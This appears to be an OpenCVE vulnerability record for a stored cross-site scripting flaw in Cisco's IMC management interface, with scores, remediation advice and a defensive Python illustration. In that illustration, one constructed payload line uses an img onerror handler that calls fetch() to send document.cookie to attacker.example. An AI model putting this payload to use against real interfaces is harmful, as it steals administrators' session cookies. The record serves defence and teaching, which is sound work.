Description
A vulnerability in the web-based management interface of Cisco IMC could allow an authenticated, remote attacker with administrative privileges to conduct a stored XSS attack against a user of the interface.

This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information.
Published: 2026-04-01
Score: 4.8 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored cross‑site scripting that allows an authenticated attacker with administrative privileges to execute arbitrary JavaScript in the browser of an affected user of the interface.
Action: Apply Patch
AI Analysis

Impact

A stored cross‑site scripting vulnerability is present in the web‑based management interface of Cisco Integrated Management Controller (IMC). An attacker who has authenticated with administrative privileges can store script code through the interface; the payload persists on the device and executes when another user of the interface views the affected page, which the advisory describes as reaching the victim through a crafted link. The script runs in the victim's browser within that user's authenticated session and can read sensitive, browser‑based information. The root cause is insufficient validation of user input, classified as CWE‑79.
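To make the CWE‑79 pattern concrete, the following Python is an added illustration; it is not Cisco code and is not derived from the advisory. A hypothetical free‑text field that an administrator stores through a management interface is rendered once without encoding and once with HTML output encoding, next to allow‑list validation at the point of storage and the Content‑Security‑Policy header a fixed server could send. The field name, the payload, the template and the policy are all constructed for the example.

```python
"""Stored XSS (CWE-79): unencoded rendering beside output-encoded rendering.

Added illustration, not Cisco code and not derived from the advisory. The
'description' field, the payload, the template and the CSP are constructed
for this example.
"""
import html
import re

# Constructed: a value an attacker with administrative rights stores through a
# hypothetical free-text field; it sits in the device's configuration until
# another administrator opens the page that displays it.
STORED_DESCRIPTION = (
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
)

_CELL_OPEN = "<td class='desc'>"
_CELL_CLOSE = "</td>"


def render_vulnerable(stored: str) -> str:
    """Interpolates the stored value straight into HTML: the browser parses the
    attacker's <img> tag and runs its onerror handler in the victim's session."""
    return f"{_CELL_OPEN}{stored}{_CELL_CLOSE}"


def render_escaped(stored: str) -> str:
    """Encodes for the HTML text-node context, so <, >, &, ' and " arrive as
    entities and the value is displayed rather than parsed."""
    return f"{_CELL_OPEN}{html.escape(stored, quote=True)}{_CELL_CLOSE}"


def is_valid_description(value: str, max_len: int = 256) -> bool:
    """Allow-list validation at the point of storage, as defence in depth.
    Reject rather than sanitise: a stored value is reused in several contexts
    (HTML, JSON, logs) and only the renderer knows which encoding applies."""
    return len(value) <= max_len and re.fullmatch(r"[A-Za-z0-9 ._,:()/-]*", value) is not None


def renders_as_markup(cell: str) -> bool:
    """True if the stored part of a rendered cell still contains a raw '<',
    i.e. the browser would see tag boundaries that came from user data."""
    body = cell[len(_CELL_OPEN):len(cell) - len(_CELL_CLOSE)]
    return "<" in body


def csp_header(nonce: str) -> str:
    """Content-Security-Policy a fixed server could send with every page.
    Inline event handlers such as onerror= are blocked because neither
    'unsafe-inline' nor 'unsafe-hashes' is granted; only nonced scripts run."""
    return (
        f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; base-uri 'none'; frame-ancestors 'none'"
    )


if __name__ == "__main__":
    print(render_vulnerable(STORED_DESCRIPTION))
    print(render_escaped(STORED_DESCRIPTION))
    print(csp_header("r4nd0m"))
```

The encoded renderer is the fix; the validation and the header are layers behind it. Note that the header is only effective if the server emits it: a browser cannot impose a Content Security Policy on a site by itself, which is why CSP belongs with the vendor fix rather than on an operator's checklist.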

Affected Systems

The affected products are Cisco Enterprise NFV Infrastructure Software, Cisco Unified Computing System (Standalone), and Cisco Unified Computing System E‑Series Software (UCSE). The record carries no version details, so consult the Cisco advisory referenced under Recommended Actions to determine which firmware or software releases are affected and which carry the fix.

Risk and Exploitability

The CVSS 3.1 base score of 4.8 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N) is held down by two factors: the attacker must already hold administrative privileges on the IMC (PR:H), and a victim must interact (UI:R). Scope is Changed because the script executes in the victim's browser rather than in the IMC itself, and the confidentiality and integrity impacts are rated Low. The EPSS probability is below 1%, the SSVC assessment records no known exploitation, and the CVE is not in the CISA KEV catalog, so there is no public evidence of exploitation. The practical risk is an insider, or an attacker who has already compromised one administrative account, using the flaw to reach the browser sessions of other administrators; it deserves attention where several people share administration of the same controllers or where the management interface is reachable from outside a dedicated management network.

Generated by OpenCVE AI on April 2, 2026 at 02:42 UTC.

Remediation

The OpenCVE record lists no vendor fix or workaround. The recommended action on this page is to apply the patch, so treat the Cisco advisory linked under Recommended Actions as the authoritative source for fixed releases and any workaround.

OpenCVE Recommended Actions

  • Check the Cisco advisory at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-xss-A2tkgVAB for the latest patch or upgrade guidance.
  • Apply the vendor‑provided patch or upgrade to a firmware/software version that eliminates the stored XSS flaw.
  • If a patch is not yet available, limit administrative access to trusted personnel and enforce strong authentication controls. Because the stored payload can only be planted by an account that already holds administrative privileges, an unexplained configuration change made under an administrative account is the footprint to look for in the controller's audit or event log; review those logs and reset credentials for any account whose changes cannot be accounted for.
  • Content Security Policy is a response header set by the web application, not a setting an operator can apply in the browser, so it mitigates this flaw only if Cisco ships it in a fixed release; disabling JavaScript is not practical either, because the management interface depends on it. On the client side, reduce the exposure of privileged sessions instead: administer the IMC from a dedicated management network or jump host, use a separate browser profile for infrastructure consoles, and log out when finished rather than leaving authenticated tabs open.

Generated by OpenCVE AI on April 2, 2026 at 02:42 UTC.


Advisories

No advisories yet.

History

Fri, 03 Apr 2026 10:15:00 +0000

Type: First Time appeared
Values Added: Cisco; Cisco enterprise Nfv Infrastructure Software; Cisco unified Computing System; Cisco unified Computing System Software

Type: Vendors & Products
Values Added: Cisco; Cisco enterprise Nfv Infrastructure Software; Cisco unified Computing System; Cisco unified Computing System Software

Wed, 01 Apr 2026 23:45:00 +0000

Type: Description
Values Added: A vulnerability in the web-based management interface of Cisco IMC could allow an authenticated, remote attacker with administrative privileges to conduct a stored XSS attack against a user of the interface. This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information.

Type: Title
Values Added: Cisco Integrated Management Controller Cross-Site Scripting Vulnerability

Type: Weaknesses
Values Added: CWE-79

Type: References
Values Added: (none)

Type: Metrics
Values Added: cvssV3_1

{'score': 4.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Subscriptions

Cisco: Enterprise Nfv Infrastructure Software; Unified Computing System; Unified Computing System Software
MITRE

Status: PUBLISHED

Assigner: cisco

Published:

Updated: 2026-04-22T19:10:02.232Z

Reserved: 2025-10-08T11:59:15.367Z

Link: CVE-2026-20088

Vulnrichment

Updated: 2026-04-01T17:55:15.299Z

NVD

Status : Awaiting Analysis

Published: 2026-04-01T17:28:27.457

Modified: 2026-04-03T16:11:11.357

Link: CVE-2026-20088

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-03T08:58:25Z

Weaknesses